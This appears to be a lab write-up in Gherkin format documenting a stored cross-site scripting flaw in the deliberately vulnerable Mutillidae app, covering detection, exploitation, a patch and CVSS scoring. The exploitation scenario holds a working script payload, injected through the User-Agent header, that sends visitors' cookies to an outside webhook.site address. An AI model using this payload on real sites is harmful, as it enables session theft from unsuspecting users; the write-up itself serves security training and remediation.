Feature:
  TOE:
    Mutillidae 2.1.19
  Category:
    A2 - Cross Site Scripting - Persistent
  Page name:
    http://mutillidae/index.php?page=show-log.php
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page Generation
  Goal:
    Execute arbitrary JS code in any browser visiting the page
  Recommendation:
    Validate and/or sanitize data captured by the application

  Background:
  Hacker's software:
    | Name          | Version       |
    | Windows       | 10            |
    | Google Chrome | 69.0.3497.100 |
  TOE information:
    | Name           | Version        |
    | Metasploitable | 2.6.24        |
    | PHP            | 5.2.4         |
    | Apache         | 2.2.8         |
    | Hyper-V        | 10.0.16299.15 |
    Given I am accessing the site http://mutillidae/index.php?page=show-log.php
    And enter a php site that allows me too see the access logs for the site

  Scenario: Normal use case
    Given I access the View Logs page
    Then I can see [evidence](normal.png)

  Scenario: Static detection
    When I look at the code for the Log Handler at line 68
    Then I see there is no encoding or sanitizing of user agent in the request
    """
    68 $lUserAgent = $_SERVER['HTTP_USER_AGENT'];
    """
    Then I can conclude there is a XSS vulnerability

  Scenario: Dynamic detection
    Given I go to any page on the site
    And change my User Agent string via Chrome Developer Tools to
    """
    <script>alert("XSS")</script>
    """
    And I reload the page with my new User Agent
    Then I go to the View Logs page
    And get an alert saying 'XSS' as evidenced in [evidence](detection.png)
    Then I can conclude there is an XSS vulnerability.

  Scenario: Exploitation
    Given I go to any page on the site
    And change my User Agent string via Chrome Developer Tools to
    """
    <script>const Http = new XMLHttpRequest(); Http.open("POST",
    "https://webhook.site/7610b094-18e7-4583-828a-22791c783266");
    Http.send(document.cookie);</script>
    """
    And I reload the page with my new User Agent
    Then I go to the View Logs page
    And see nothing suspicious except a single entry with no Browser Agent
    Then I go to
    """
    https://webhook.site/#/7610b094-18e7-4583-828a-22791c783266/39c94f6f-fb5
    b-4b30-815b-94fb9b0125c2/1
    """
    And I can see the requests made to that url
    And you can see this too in [evidence](exploitation.png)
    And see logged requests containing the victim's cookies
    Then I can use these cookies as I see fit

  Scenario: Remediation
    Given I have patched the code by encoding the user agent from requests
    """
    68 $lUserAgent= $this->Encoder->encodeForHTML($_SERVER['HTTP_USER_AGENT']);
    """
    And I navigate the site with my modified User Agent
    And I go to View Logs
    Then I see [evidence](remediation.png)
    And my malicious code doesn't run
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    4.7/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.6/10 (Medium) - E:F/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    5.5/10 (Medium) - CR:H/IR:L/AR:L

  Scenario: Correlations
  No correlations have been found to this date 2018/10/23
